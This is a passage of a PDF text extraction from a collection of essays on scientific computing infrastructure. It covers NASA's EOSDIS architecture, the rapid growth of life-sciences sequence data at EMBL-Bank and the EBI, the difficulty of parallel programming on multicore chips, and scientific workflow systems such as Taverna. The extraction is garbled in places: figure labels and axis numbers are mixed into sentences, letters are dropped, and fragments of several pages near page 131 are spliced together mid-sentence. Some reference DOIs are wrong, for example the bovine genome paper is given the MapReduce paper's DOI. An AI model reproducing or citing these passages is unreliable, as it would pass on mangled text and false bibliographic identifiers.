contractor. The underlying architecture, with its well-defined (and relatively modest-sized) data flows and mix of centralized and distributed components, has remained undisturbed, even as the World Wide Web, the Internet, and the volume of online data have grown exponentially. 112 SCIENTIFIC INFRASTRUCTURE Media Distribution Data Ingest Ingested data Plans Other Sites Figure 1. NASAs Earth Observing System Data and Information System (EOSDIS) as planned in 1989. Today, the suite of national supercomputer centers as well as the notion of cloud computing looks much the same as the architecture shown in Figure 1. It doesnt matter whether the network connection is an RS-232 asynchronous connection, a dial-up modem, or a gigabit network, or whether the device on the scientists desktop is a VT100 graphics terminal or a high-end multicore workstation. Virtualized (but distributed) repositories of data storage and computing capabilities are accessed via network by relatively low-capability devices. Moores Law has had 25 years to play out since the design of EOSDIS. Although we generally focus on the increases in capacity and the precipitous decline in the price/performance ratio, the pace of rapid technological innovation has placed enormous pressure on the traditional modes of scientific research. The vast amounts of data have greatly reduced the value of an individual data element, and we are no 113 longer data-limited but insight-limited. Data-intensive should not refer just to the centralized repositories but also to the far greater volumes of data that are networkaccessible in offices, labs, and homes and by sensors and portable devices. Thus, data-intensive computing should be considered more than just the ability to store and move larger amounts of data. The complexity of these new datasets as well as the increasing diversity of the data flows is rendering the traditional compute/datacenter model obsolete for modern scientific research. Implications for Science IT has affected the science community in two ways. First, it has led to the commoditization of generic storage and computing. For science tasks that can be accomplished through commodity services, such services are a reasonable option. It will always be more cost effective to use low-profit-margin, high-volume services through centralized mechanisms such as cloud computing. Thus more universities are relying on such services for data backup, e-mail, office productivity applications, and so on. The second way that IT has affected the science community is through radical personalization. With personal access to teraflops of computing and terabytes of storage, scientists can create their own compute clouds. Innovation and new science services will come from the edges of the networks, not the commodity-driven datacenters. Moreover, not just scientists but the vastly larger number of sensors and laboratory instruments will soon be connected to the Internet with their own local computation and storage services. The challenge is to harness the power of this new network of massively distributed knowledge services. Today, scientific discovery is not accomplished solely through the well-defined, rigorous process of hypothesis testing. The vast volumes of data, the complex and hard-to-discover relationships, the intense and shifting types of collaboration between disciplines, and new types of near-real-time publishing are adding pattern and rule discovery to the scientific method [6]. Especially in the area of climate science and policy, we could see a convergence of this new type of data-intensive research and the new generation of IT capabilities. The alignment of science supply and demand in the context of continuing scientific uncertainty will depend on seeking out new relationships, overcoming language and cultural barriers to enable collaboration, and merging models and data to evaluate scenarios. This process has far more in common with network gaming than with the traditional scientific method. Capturing the important elements of 114 SCIENTIFIC INFRASTRUCTURE data preservation, collaboration, provenance, and accountability will require new approaches in the highly distributed, data-intensive research community. Instead of well-defined data networks and factories coupled with an individually based publishing system that relies on peer review and tenure, this new research enterprise will be more unruly and less predictable, resembling an ecosystem in its approach to knowledge discovery. That is, it will include loose networks of potential services, rapid innovation at the edges, and a much closer partnership between those who create knowledge and those who use it. As with every ecosystem, emergent (and sometimes unpredictable) behavior will be a dominant feature. Our existing institutionsincluding federal agencies and research universities will be challenged by these new structures. Access to data and computation as well as new collaborators will not require the physical structure of a university or millions of dollars in federal grants. Moreover, the rigors of tenure and its strong emphasis on individual achievement in a single scientific discipline may work against these new approaches. We need an organization that integrates natural science with socioeconomic science, balances science with technology, focuses on systems thinking, supports flexible and interdisciplinary approaches to long-term problem solving, integrates knowledge creation and knowledge use, and balances individual and group achievement. Such a new organization could pioneer integrated approaches to a sustainable future, approaches that are aimed at understanding the variety of possible futures. It would focus on global-scale processes that are manifested on a regional scale with pronounced socioeconomic consequences. Rather than a traditional academic organization with its relatively static set of tenure-track professors, a new organization could take more risks, build and develop new partnerships, and bring in people with the talent needed for particular tasks. Much like in the U.S. television series Mission Impossible, we will bring together people from around the world to address specific problemsin this case, climate change issues. Making It Happen How can todays IT enable this type of new organization and this new type of science? In the EOSDIS era, it was thought that relational databases would provide the essential services needed to manage the vast volumes of data coming from the EOS satellites. Although database technology provided the baseline services needed for the standard EOS data products, it did not capture the innovation at the edges of the system where science was in control. Today, semantic webs and ontologies are 115 being proposed as a means to enable knowledge discovery and collaboration. However, as with databases, it is likely that the science community will be reluctant to use these inherently complex tools except for the most mundane tasks. Ultimately, digital technology can provide only relatively sparse descriptions of the richness and complexity of the real world. Moreover, seeking the unusual and unexpected requires creativity and insightprocesses that are difficult to represent in a rigid digital framework. On the other hand, simply relying on PageRank1-like statistical correlations based on usage will not necessarily lead to detection of the rare and the unexpected. However, new IT tools for the data-intensive world can provide the ability to filter these data volumes down to a manageable level as well as provide visualization and presentation services to make it easier to gain creative insights and build collaborations. The architecture for data-intensive computing should be based on storage, computing, and presentation services at every node of an interconnected network. Providing standard, extensible frameworks that accommodate innovation at the network edges should enable these knowledge ecosystems to form and evolve as the needs of climate science and policy change. References [1] D. S. Greenberg, Science, Money, and Politics: Political Triumph and Ethical Erosion. Chicago: University of Chicago Press, 2001. [2] National Research Council, Assessing the Impacts of Changes in the Information Technology R&D Ecosystem: Retaining Leadership in an Increasingly Global Environment. Washington, D.C.: National Academies Press, 2009. [3] D. Sarewitz and R. A. Pielke, Jr., The neglected heart of science policy: reconciling supply of and demand for science, Environ. Sci. Policy, vol. 10, pp. 516, 2007, doi: 10.1016/ j.envsci.2006.10.001. [4] L. Dilling, Towards science in support of decision making: characterizing the supply of carbon cycle science, Environ. Sci. Policy, vol. 10, pp. 4861, 2007, doi: 10.1016/j.envsci.2006.10.008. [5] Intergovernmental Panel on Climate Change, Climate Change 2007: The Physical Science Basis. New York: Cambridge University Press, 2007. [6] C. Anderson, The End of Theory, Wired, vol. 16, no. 7, pp. 108109, 2008. 116 SCIENTIFIC INFRASTRUCTURE s ci e n t i f i c i n f r a s t r u c t u r e Beyond the Tsunami: Developing the Infrastructure to Deal with Life Sciences Data cientific revolutions are difficult to quantify, but the rate of data generation in science has increased so profoundly that we can simply examine a single area of the life sciences to appreciate the magnitude of this effect across all of them. Figure 1 on the next page tracks the dramatic increase in the number of individual bases submitted to the European Molecular Biology Laboratory Nucleotide Sequence Database1 (EMBL-Bank) by the global experimental community. This submission rate is currently growing at 200% per annum. Custodianship of the data is held by the International Nucleotide Sequence Database Collaboration (INSDC), which consists of the DNA Data Bank of Japan (DDBJ), GenBank in the U.S., and EMBL-Bank in the UK. These three repositories exchange new data on a daily basis. As of May 2009, the totals stood at approximately 250 billion bases in 160 million entries. A recent submission to EMBL-Bank, accession number FJ982430, illustrates the speed of data generation and the effectiveness of the global bioinformatics infrastructure in responding to a health crisis. It includes the complete H1 subunit sequence of 1,699 bases from the first case of novel H1N1 influenza virus in Denmark. This was submitted on May 4, 2009, within days of 117 the infected person being diagnosed. Many more virus subunit sequences Growth Rate of EMBL-Bank 300 have been submitted from the U.S., S cale in January 3, 2009: billion s 270.3 billion Italy, Mexico, Canada, Denmark, and 250 Israel since the beginning of the 2009 global H1N1 pandemic. 200 EMBL-Bank is hosted at the European Bioinformatics Institute (EBI), 150 an academic organization based in Cambridge, UK, that forms part of 100 the European Molecular Biology Laboratory (EMBL). The EBI is a cen50 ter for both research and services in bioinformatics. It hosts biological 0 data, including nucleic acid, proRelease Date tein sequences, and macromolecular structures. The neighboring Wellcome Trust Sanger Institute generFigure 1. ates about 8 percent of the worlds seGrowth in the number of bases deposited in quencing data output. Both of these EMBL-Bank from 1982 to the beginning of 2009. institutions on the Wellcome Trust Genome campus include scientists who generate data and administer the databases into which it flows, biocurators who provide annotations, bioinformaticians who develop analytical tools, and research groups that seek biological insights and consolidate them through further experimentation. Consequently, it is a community in which issues surrounding computing infrastructure, data storage, and mining are confronted on a daily basis, and in which both local and global collaborative solutions are continually explored. The collective name for the nucleotide sequencing information service is the European Nucleotide Archive [1]. It includes EMBL-Bank and three other repositories that were set up for new types of data generation: the Trace Archive for trace data from first-generation capillary instruments, the Short Read Archive for data from next-generation sequencing instruments, and a pilot Trace Assembly Archive that stores alignments of sequencing reads with links to finished genomic sequences in EMBL-Bank. Data from all archives are exchanged regularly with the National Center for Biotechnology Information in the U.S. Figure 2 compares the sizes of Number of Bases 1985 1990 1995 1982 2000 2005 2009 118 SCIENTIFIC INFRASTRUCTURE Volume (Terabytes) 1.9 30 75 The introduction in 2005 of so-called next-generation sequencing instruments that are capable of producing millions of DNA sequence reads in a single run has not only led to a huge increase in Volume (Terabases) genetic information but has also placed bioinfor0.27 matics, and life sciences research in general, at the leading of edge of infrastructure development for 1.5 the storage, movement, analysis, interpretation, 1.7 and visualization of petabyte-scale datasets [2]. The Short Read Archive, the European repository for accepting data from these machines, received Capillary Traces 30 terabytes (TB) of data in the first six months Next Gen. Reads Assembled Sequence of operationequivalent to almost 30% of the entire EMBL-Bank content accumulated over the Figure 2. 28 years since data collection began. The uptake The size in data volume and nuof new instruments and technical developments cleotide numbers of EMBL-Bank, will not only increase submissions to this archive the Trace Archive, and the Short manyfold within a few years, but it will also preRead Archive as of May 2009. lude the arrival of next-next-generation DNA sequencing systems [3]. To meet this demand, the EBI has increased storage from 2,500 TB (2.5 PB) in 2008 to 5,000 TB (5 PB) in 2009an approximate annual doubling. Even if the capacity keeps pace, bottlenecks might emerge as I/O limitations move to other points in the infrastructure. For example, at this scale, traditional backup becomes impractically slow. Indeed, a hypothetical total data loss at the EBI is estimated to require months of restore time. This means that streamed replication of the original data is becoming a more efficient option, with copies being stored at multiple locations. Another bottleneck example is that technical advances in data transfer speeds now exceed the capacity to write out to disksabout 70 megabits/sec, with no imminent expectation of major performance increases. The problem can be ameliorated by writing to multiple disks, but at a considerable increase in cost. This inexorable load increase necessitates continual assessment of the balance 119 between submitting derived data to the repositories and storing raw instrument output locally. Scientists at all stages of the process, experimentalists, instrument operators, datacenter administrators, bioinformaticians, and biologists who analyze the results will need to be involved in decisions about storage strategies. For example, in laboratories running high-throughput sequencing instruments, the cost of storing raw data for a particular experiment is already approaching that of repeating the experiment. Researchers may balk at the idea of deleting raw data after processing, but this is a pragmatic option that has to be considered. Less controversial solutions involve a triage of data reduction options between raw output, base calls, sequence reads, assemblies, and genome consensus sequences. An example of such a solution is FASTQ, a text-based format for storing both a nucleotide sequence and its corresponding quality scores, both encoded with a single ASCII character. Developed by the Sanger Institute, it has recently become a standard for storing the output of next-generation sequencing instruments. It can produce a 200-fold reduction in data volumethat is, 99.5% of the raw data can be discarded. Even more compressed sequence data representations are in development. Genomes: Rolling Off the Production Line The production of complete genomes is rapidly advancing our understanding of biology and evolution. The impressive progress is illustrated in Figure 3, which depicts the increase of genome sequencing projects in the Genomes OnLine Database (GOLD). While the figure was generated based on all global sequencing projects, many of these genomes are available for analysis on the Ensembl Web site hosted jointly by the EBI and the Sanger Institute. The graph shows that, by 2010, well over 5,000 genome projects will have been initiated and more than 1,000 will have produced complete assemblies. A recent significant example is the bovine genome [4], which followed the chicken and will soon be joined by all other major agricultural species. These will not only help advance our understanding of mammalian evolution and domestication, but they will also accelerate genetic improvements for farming and food production. Resequencing the Human Genome: Another Data Scale-up Recent genome-wide studies of human genetic variation have advanced our understanding of common human diseases. This has motivated the formation of an international consortium to develop a comprehensive catalogue of sequence variants in 120 SCIENTIFIC INFRASTRUCTURE multiple human populations. Over the next three years, the Sanger Institute, BGI Shenzhen in China, and the Na4500 January 2009: tional Human Genome Research Insti4,370 Projects 4000 tutes Large-Scale Genome Sequencing 3500 Program in the U.S. are planning to sequence a minimum of 1,000 human 3000 genomes. 2500 In 2008, the pilot phase of the proj2000 ect generated approximately 1 terabase 1500 (trillion bases) of sequence data per Incomplete month; the number is expected to dou1000 ble in 2009. The total generated will be 500 about 20 terabases. The requirement Complete 0 of about 30 bytes of disk storage per base of sequence can be extrapolated Year to about 500 TB of data for the entire project. By comparison, the original Figure 3. human genome project took about 10 The increase in both initiated and completed years to generate about 40 gigabases genome projects since 1997 in the Genomes (billion bases) of DNA sequence. Over OnLine Database (GOLD). Courtesy of GOLD. the next two years, up to 10 billion bases will be sequenced per day, equating to more than two human genomes (at 2.85 billion per human) every 24 hours. The completed dataset of 6 trillion DNA bases will be 60 times more sequence data than that shown earlier in Figure 1. Projects Even before the arrival of the draft human genome in 2001, biological databases were moving from the periphery to the center of modern life sciences research, leading to the problem that the capacity to mine data has fallen behind our ability to generate it. As a result, there is a pressing need for new methods to fully exploit not only genomic data but also other high-throughput result sets deposited in databases. These result sets are also becoming more hypothesis-neutral compared with traditional small-scale, focused experiments. Usage statistics for EBI services, shown in Figure 4 on the next page, show that the biological community, sup- 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 121 ported by the bioinformatics specialists they collaborate 1,000,000 with, are accessing these resources in increasing num800,000 bers. The Web pages associated with the 63 databases hosted 600,000 at the EBI now receive over 3.5 million hits per day, rep400,000 CGI resenting more than half a million independent us200,000 ers per month. While this does not match the increase API 0 in rates of data accumula2005 2006 2007 2008 2009 Year tion, evidence for a strong increase in data mining is Figure 4. provided by the Web serWeb accesses (Common Gateway Interface [CGI]) and Web vices programmatic access services usage (application programming interface [API]) figures, which are approachrecorded on EBI servers from 2005 to 2009. ing 1 million jobs per month. To further facilitate data use, the EBI is developing, using open standards, the EB-eye search system to provide a single entry point. By indexing in various formats (e.g., flat files, XML dumps, and OBO format), the system provides fast access and allows the user to search globally across all EBI databases or individually in selected resources. EBI resources are effectively responding to increasing demand from both the generators and users of data, but increases in scale for the life sciences across the whole of Europe require long-term planning. This is the mission of the ELIXIR project, which aims to ensure a reliable distributed infrastructure to maximize access to biological information that is currently distributed in more than 500 databases throughout Europe. The project addresses not only data management problems but also sustainable funding to maintain the data collections and global collaborations. It is also expected to put in place processes for developing collections for new data 122 SCIENTIFIC INFRASTRUCTURE Number of Jobs types, supporting interoperability of bioinformatics tools, and developing bioinformatics standards and ontologies. The development of ELIXIR parallels the transition to a new phase in which high-performance, data-intensive computing is becoming essential to progress in the life sciences [5]. By definition, the consequences for research cannot be predicted with certainty. However, some pointers can be given. By mining not only the increasingly comprehensive datasets generated by genome sequencing mentioned above but also transcript data, proteomics information, and structural genomics output, biologists will obtain new insights into the processes of life and their evolution. This will in turn facilitate new predictive power for synthetic biology and systems biology. Beyond its profound impact on the future of academic research, this data-driven progress will also translate to the more applied areas of sciencesuch as pharmaceutical research, biotechnology, medicine, public health, agriculture, and environmental scienceto improve the quality of life for everyone. References [1] G. Cochrane et al., Petabyte-scale innovations at the European Nucleotide Archive, Nucleic Acids Res., vol. 37, pp. D1925, Jan. 2009, doi: 10.1093/nar/gkn765. [2] E. R. Mardis, The impact of next-generation sequencing technology on genetics, Trends Genet., vol. 24, no. 3, pp. 133141, Mar. 2008, doi: 10.1016/j.physletb.2003.10.071. [3] N. Blow, DNA sequencing: generation next-next, Nat. Methods, vol. 5, pp. 267274, 2008, doi: 10.1038/nmeth0308-267. [4] Bovine Genome Sequencing and Analysis Consortium, The genome sequence of taurine cattle: a window to ruminant biology and evolution, Science, vol. 324, no. 5926, pp. 522528, Apr. 24, 2009, doi: 10.1145/1327452.1327492. [5] G. Bell, T. Hey, and A. Szalay, Beyond the Data Deluge, Science, vol. 323, no. 5919, pp. 12971298, Mar. 6, 2009, doi: 10.1126/science.1170411. 123 s ci e n t i f i c i n f r a s t r u c t u r e tion, and scientific research have grown up together. Scientists and researchers insatiable need to perform more and larger computations has long exceeded the capabilities of conventional computers. The only approach that has met this need is parallelismcomputing more than one operation simultaneously. At one level, parallelism is simple and easy to put into practice. Building a parallel computer by replicating key operating components such as the arithmetic units or even complete processors is not difficult. But it is far more challenging to build a well-balanced machine that is not stymied by internal bottlenecks. In the end, the principal problem has been software, not hardware. Parallel programs are far more difficult to design, write, debug, and tune than sequential softwarewhich itself is still not a mature, reproducible artifact. The Evolution of Parallel Computing The evolution of successive generations of parallel computing hardware has also forced a constant rethinking of parallel algorithms and software. Early machines such as the IBM Stretch, the Cray I, and the Control Data Cyber series all exposed parallelism as vector operations. The Cray II, Encore, Alliant, and many generations of IBM machines were built with multiple processors that 125 shared memory. Because it proved so difficult to increase the number of processors while sharing a single memory, designs evolved further into systems in which no memory was shared and processors shared information by passing messages. Beowulf clusters, consisting of racks of standard PCs connected by Ethernet, emerged as an economical approach to supercomputing. Networks improved in latency and bandwidth, and this form of distributed computing now dominates supercomputers. Other systems, such as the Cray multi-threaded platforms, demonstrated that there were different approaches to addressing shared-memory parallelism. While the scientific computing community has struggled with programming each generation of these exotic machines, the mainstream computing world has been totally satisfied with sequential programming on machines where any parallelism is hidden from the programmer deep in the hardware. In the past few years, parallel computers have entered mainstream computing with the advent of multicore computers. Previously, most computers were sequential and performed a single operation per time step. Moores Law drove the improvements in semiconductor technology that doubled the transistors on a chip every two years, which increased the clock speed of computers at a similar rate and also allowed for more sophisticated computer implementations. As a result, computer performance grew at roughly 40% per year from the 1970s, a rate that satisfied most software developers and computer users. This steady improvement ended because increased clock speeds require more power, and at approximately 3 GHz, chips reached the limit of economical cooling. Computer chip manufacturers, such as Intel, AMD, IBM, and Sun, shifted to multicore processors that used each Moores Law generation of transistors to double the number of independent processors on a chip. Each processor ran no faster than its predecessor, and sometimes even slightly slower, but in aggregate, a multicore processor could perform twice the amount of computation as its predecessor. Parallel Programming Challenges This new computer generation rests on the same problematic foundation of software that the scientific community struggled with in its long experience with parallel computers. Most existing general-purpose software is written for sequential computers and will not run any faster on a multicore computer. Exploiting the potential of these machines requires new, parallel software that can break a task into multiple pieces, solve them more or less independently, and assemble the results into a single answer. Finding better ways to produce parallel software is currently 126 SCIENTIFIC INFRASTRUCTURE the most pressing problem facing the software development community and is the subject of considerable research and development. The scientific and engineering communities can both benefit from these urgent efforts and can help inform them. Many parallel programming techniques originated in the scientific community, whose experience has influenced the search for new approaches to programming multicore computers. Future improvements in our ability to program multicore computers will benefit all software developers as the distinction between the leading-edge scientific community and general-purpose computing is erased by the inevitability of parallel computing as the fundamental programming paradigm. One key problem in parallel programming today is that most of it is conducted at a very low level of abstraction. Programmers must break their code into components that run on specific processors and communicate by writing into shared memory locations or exchanging messages. In many ways, this state of affairs is similar to the early days of computing, when programs were written in assembly languages for a specific computer and had to be rewritten to run on a different machine. In both situations, the problem was not just the lack of reusability of programs, but also that assembly language development was less productive and more error prone than writing programs in higher-level languages. Addressing the Challenges Several lines of research are attempting to raise the level at which parallel programs can be written. The oldest and best-established idea is data parallel programming. In this programming paradigm, an operation or sequence of operations is applied simultaneously to all items in a collection of data. The granularity of the operation can range from adding two numbers in a data parallel addition of two matrices to complex data mining calculations in a map-reduce style computation [1]. The appeal of data parallel computation is that parallelism is mostly hidden from the programmer. Each computation proceeds in isolation from the concurrent computations on other data, and the code specifying the computation is sequential. The developer need not worry about the details of moving data and running computations because they are the responsibility of the runtime system. GPUs (graphics processing units) provide hardware support for this style of programming, and they have recently been extended into GPGPUs (general-purpose GPUs) that perform very high-performance numeric computations. Unfortunately, data parallelism is not a programming model that works for all 127 types of problems. Some computations require more communication and coordination. For example, protein folding calculates the forces on all atoms in parallel, but local interactions are computed in a manner different from remote interactions. Other examples of computations that are hard to write as data parallel programs include various forms of adaptive mesh refinement that are used in many modern physics simulations in which local structures, such as clumps of matter or cracks in a material structure, need finer spatial resolution than the rest of the system. A new idea that has recently attracted considerable research attention is transactional memory (TM), a mechanism for coordinating the sharing of data in a multicore computer. Data sharing is a rich source of programming errors because the developer needs to ensure that a processor that changes the value of data has exclusive access to it. If another processor also tries to access the data, one of the two updates can be lost, and if a processor reads the data too early, it might see an inconsistent value. The most common mechanism for preventing this type of error is a lock, which a program uses to prevent more than one processor from accessing a memory location simultaneously. Locks, unfortunately, are low-level mechanisms that are easily and frequently misused in ways that both allow concurrent access and cause deadlocks that freeze program execution. TM is a higher-level abstraction that allows the developer to identify a group of program statements that should execute atomicallythat is, as if no other part of the program is executing at the same time. So instead of having to acquire locks for all the data that the statements might access, the developer shifts the burden to the runtime system and hardware. TM is a promising idea, but many engineering challenges still stand in the way of its widespread use. Currently, TM is expensive to implement without support in the processors, and its usability and utility in large, realworld codes is as yet undemonstrated. If these issues can be resolved, TM promises to make many aspects of multicore programming far easier and less error prone. Another new idea is the use of functional programming languages. These languages embody a style of programming that mostly prohibits updates to program state. In other words, in these languages a variable can be given an initial value, but that value cannot be changed. Instead, a new variable is created with the new value. This style of programming is well suited to parallel programming because it eliminates the updates that require synchronization between two processors. Parallel, functional programs generally use mutable state only for communication among parallel processors, and they require locks or TM only for this small, distinct part of their data. 128 SCIENTIFIC INFRASTRUCTURE Until recently, only the scientific and engineering communities have struggled with the difficulty of using parallel computers for anything other than the most embarrassingly parallel tasks. The advent of multicore processors has changed this situation and has turned parallel programming into a major challenge for all software developers. The new ideas and programming tools developed for mainstream programs will likely also benefit the technical community and provide it with new means to take better advantage of the continually increasing power of multicore processors. REFERENCES [1] D. Gannon and D. Reed, Parallelism and the Cloud, in this volume. 129 s ci e n t i f i c i n f r a s t r u c t u r e 131a users browser or client application. This Web role layer accepts us- 132 SCIENTIFIC INFRASTRUCTURE erssuch as for search, customized maps, social networks, weather services, travel data, or online auctions patternt Webs. 133] Presidents Information Technology Advisory Committee, Computational Science: Ensuring Americas Competitiveness, June 2005, computational.pdf. [2] D. A. Reed, Ed., Workshop on The Roadmap for the Revitalization of High-End Computing, June 2003,. [3] S. L. Graham, M. Snir, and C. A. Patterson, Eds., Getting Up to Speed: The Future of Supercomputing, Washington, D.C.: National Academies Press, 2004, id=11148. [4] J. Dean and S. Ghemawat, MapReduce: Simplified Data Processing on Large Clusters, OSDI04: Sixth Symposium on Operating Systems Design and Implementation, San Francisco, CA, Dec. 2004, doi: 10.1145/1327452.1327492. 134 SCIENTIFIC INFRASTRUCTURE [5] Y. Yu., M. Isard, D. Fetterly, M. Budiu, . Erlingsson, P. Kumar Gunda, and J. Currey, DryadLINQ: A System for General-Purpose Distributed Data-Parallel Computing Using a High-Level Language, OSDI08 Eighth Symposium on Operating Systems Design and Implementation. 135 s ci e n t i f i c i n f r a s t r u c t u r e in which hypotheses are not only tested through directed data collection and analysis but also generated by combining and mining the pool of data already available [1-3]. The scientific data landscape we draw upon is expanding rapidly in both scale and diversity. Taking the life sciences as an example, high-throughput gene sequencing platforms are capable of generating terabytes of data in a single experiment, and data volumes are set to increase further with industrial-scale automation. From 2001 to 2009, the number of databases reported in Nucleic Acids Research jumped from 218 to 1,170 [4]. Not only are the datasets growing in size and number, but they are only partly coordinated and often incompatible [5], which means that discovery and integration tasks are significant challenges. At the same time, we are drawing on a broader array of data sources: modern biology draws insights from combining different types of omic data (proteomic, metabolomic, transcriptomic, genomic) as well as data from other disciplines such as chemistry, clinical medicine, and public health, while systems biology links multiscale data with multi-scale mathematical models. These data encompass all types: from structured database records to published articles, raw numeric data, images, and descriptive interpretations that use controlled vocabularies. 137 Data generation on this scale must be matched by scalable processing methods. The preparation, management, and analysis of data are bottlenecks and also beyond the skill of many scientists. Workflows [6] provide (1) a systematic and automated means of conducting analyses across diverse datasets and applications; (2) a way of capturing this process so that results can be reproduced and the method can be reviewed, validated, repeated, and adapted; (3) a visual scripting interface so that computational scientists can create these pipelines without low-level programming concern; and (4) an integration and access platform for the growing pool of independent resource providers so that computational scientists need not specialize in each one. The workflow is thus becoming a paradigm for enabling science on a large scale by managing data preparation and analysis pipelines, as well as the preferred vehicle for computational knowledge extraction. Workflows Defined A workflow is a precise description of a scientific procedurea multi-step process to coordinate multiple tasks, acting like a sophisticated script [7]. Each task represents the execution of a computational process, such as running a program, submitting a query to a database, submitting a job to a compute cloud or grid, or invoking a service over the Web to use a remote resource. Data output from one task is consumed by subsequent tasks according to a predefined graph topology that orchestrates the flow of data. Figure 1 presents an example workflow, encoded in the Taverna Workflow Workbench [8], which searches for genes by linking four publicly available data resources distributed in the U.S., Europe, and Japan: BioMart, Entrez, UniProt, and KEGG. Workflow systems generally have three components: an execution platform, a visual design suite, and a development kit. The platform executes the workflow on behalf of applications and handles common crosscutting concerns, including (1) invocation of the service applications and handling the heterogeneity of data types and interfaces on multiple computing platforms; (2) monitoring and recovery from failures; (3) optimization of memory, storage, and execution, including concurrency and parallelization; (4) data handling: mapping, referencing, movement, streaming, and staging; (5) logging of processes and data provenance tracking; and (6) security and monitoring of access policies. Workflow systems are required to support long-running processes in volatile environments and thus must be robust and capable of fault tolerance and recovery. They also need to evolve continually to harness the growing capabilities of underlying computational and storage 138 SCIENTIFIC INFRASTRUCTURE Workflow Inputs qtl_end_position qtl_start_position genes_in_qtl mmusculus_gene_ensembl remove_uniprot_duplicates merge_uniprot_ids REMOVE_NULLS_2 add_uniprot_to_string Kegg_gene_ids concat_kegg_genes regex_2 split_gene_ids merge_kegg_references remove_entrez_duplicates merge_entrez_genes remove_Nulls add_ncbi_to_string Kegg_gene_ids_2 create_report merge_reports chromosome_name split_for_duplicates remove_duplicate_kegg_genes Get_pathways Workflow Inputs regex split_by_regex lister get_pathways_by_genes1 Merge_pathways concat_ids concat_gene_pathway_ids Merge_gene_pathways Workflow Outputs pathway_genes pathway_desc pathway_ids pathway_desc Merge_pathway_desc gene_ids Workflow Outputs kegg_pathway_release merged_pathways pathway_descriptions pathway_ids gene_descriptions kegg_external_gene_reference report ensembl_database_release Workflow Outputs An_output_port Workflow Inputs An_input_port A_local_service Beanshell A_Soaplab_service String_constant A_Biomart_Service Figure 1. A Taverna workflow that connects several internationally distributed datasets to identify candidate genes that could be implicated in resistance to African trypanosomiasis [11]. 139 resources, delivering greater capacity for analysis. The design suite provides a visual scripting application for authoring and sharing workflows and preparing the components that are to be incorporated as executable steps. The aim is to shield the author from the complexities of the underlying applications and enable the author to design and understand workflows without recourse to commissioning specialist and specific applications or hiring software engineers. This empowers scientists to build their own pipelines when they need them and how they want them. Finally, the development kit enables developers to extend the capabilities of the system and enables workflows to be embedded into applications, Web portals, or databases. This embedding is transformational: it has the potential to incorporate sophisticated knowledge seamlessly and invisibly into the tools that scientists use routinely. Each workflow system has its own language, design suite, and software components, and the systems vary in their execution models and the kinds of components they coordinate [9]. Sedna is one of the few to use the industry-standard Business Process Execution Language (BPEL) for scientific workflows [10]. General-purpose open source workflow systems include Taverna,1 Kepler,2 Pegasus,3 and Triana.4 Other systems, such as the LONI Pipeline5 for neuroimaging and the commercial Pipeline Pilot6 for drug discovery, are more geared toward specific applications and are optimized to support specific component libraries. These focus on interoperating applications; other workflow systems target the provisioning of compute cycles or submission of jobs to grids. For example, Pegasus and DAGMan7 have been used for a series of large-scale eScience experiments such as prediction models in earthquake forecasting using sensor data in the Southern California Earthquake Center (SCEC) CyberShake project.8 Workflow Usage Workflows liberate scientists from the drudgery of routine data processing so they can concentrate on scientific discovery. They shoulder the burden of routine tasks, they represent the computational protocols needed to undertake data-centric 1 140 SCIENTIFIC INFRASTRUCTURE science, and they open up the use of processes and data resources to a much wider group of scientists and scientific application developers. Workflows are ideal for systematically, accurately, and repeatedly running routine procedures: managing data capture from sensors or instruments; cleaning, normalizing, and validating data; securely and efficiently moving and archiving data; comparing data across repeated runs; and regularly updating data warehouses. For example, the Pan-STARRS9 astronomical survey uses Microsoft Trident Scientific Workflow Workbench10 workflows to load and validate telescope detections running at about 30 TB per year. Workflows have also proved useful for maintaining and updating data collections and warehouses by reacting to changes in the underlying datasets. For example, the Nijmegen Medical Centre rebuilt the tGRAP G-protein coupled receptors mutant database using a suite of text-mining Taverna workflows. At a higher level, a workflow is an explicit, precise, and modular expression of an in silico or dry lab experimental protocol. Workflows are ideal for gathering and aggregating data from distributed datasets and data-emitting algorithmsa core activity in dataset annotation; data curation; and multi-evidential, comparative science. In Figure 1, disparate datasets are searched to find and aggregate data related to metabolic pathways implicated in resistance to African trypanosomiasis; interlinked datasets are chained together by the dataflow. In this instance, the automated and systematic processing by the workflow overcame the inadequacies of manual data triagewhich leads to prematurely excluding data from analysis to cope with the quantityand delivered new results [11]. Beyond data assembly, workflows codify data mining and knowledge discovery pipelines and parameter sweeps across predictive algorithms. For example, LEAD11 workflows are driven by external events generated by data mining agents that monitor collections of instruments for significant patterns to trigger a storm prediction analysis; the Jet Propulsion Laboratory uses Taverna workflows for exploring a large space of multiple-parameter configurations of space instruments. Finally, workflow systems liberate the implicit workflow embedded in an application into an explicit and reusable specification over a common software machinery and shared infrastructure. Expert informaticians use workflow systems directly as means to develop workflows for handling infrastructure; expert 9 141 scientific informaticians use them to design and explore new investigative procedures; a larger group of scientists uses precooked workflows with restricted configuration constraints launched from within applications or hidden behind Web portals. Workflow-enabled Data-centric Science Workflows offer techniques to support the new paradigm of data-centric science. They can be replayed and repeated. Results and secondary data can be computed as needed using the latest sources, providing virtual data (or on-demand) warehouses by effectively providing distributed query processing. Smart reruns of workflows automatically deliver new outcomes when fresh primary data and new results become availableand also when new methods become available. The workflows themselves, as first-class citizens in data-centric science, can be generated and transformed dynamically to meet the requirements at hand. In a landscape of data in considerable flux, workflows provide robustness, accountability, and full auditing. By combining workflows and their execution records with published results, we can promote systematic, unbiased, transparent, and comparable research in which outcomes carry the provenance of their derivation. This can potentially accelerate scientific discovery. To accelerate experimental design, workflows can be reconfigured and repurposed as new components or templates. Creating workflows requires expertise that is hard won and often outside the skill set of the researcher. Workflows are often complex and challenging to build because they are essentially forms of programming that require some understanding of the datasets and the tools they manipulate [12]. Hence there is significant benefit in establishing shared collections of workflows that contain standard processing pipelines for immediate reuse or for repurposing in whole or in part. These aggregations of expertise and resources can help propagate techniques and best practices. Specialists can create the application steps, experts can design the workflows and set parameters, and the inexperienced can benefit by using sophisticated protocols. The myExperiment12 social Web site has demonstrated that by adopting contentsharing tools for repositories of workflows, we can enable social networking around workflows and provide community support for social tagging, comments, ratings and recommendations, and mixing of new workflows with those previously 12 142 SCIENTIFIC INFRASTRUCTURE deposited [13]. This is made possible by the scale of participation in data-centric science, which can be brought to bear on challenging problems. For example, the environment of workflow execution is in such a state of flux that workflows appear to decay over time, but workflows can be kept current by a combination of expert and community curation. Workflows enable data-centric science to be a collaborative endeavor on multiple levels. They enable scientists to collaborate over shared data and shared services, and they grant non-developers access to sophisticated code and applications without the need to install and operate 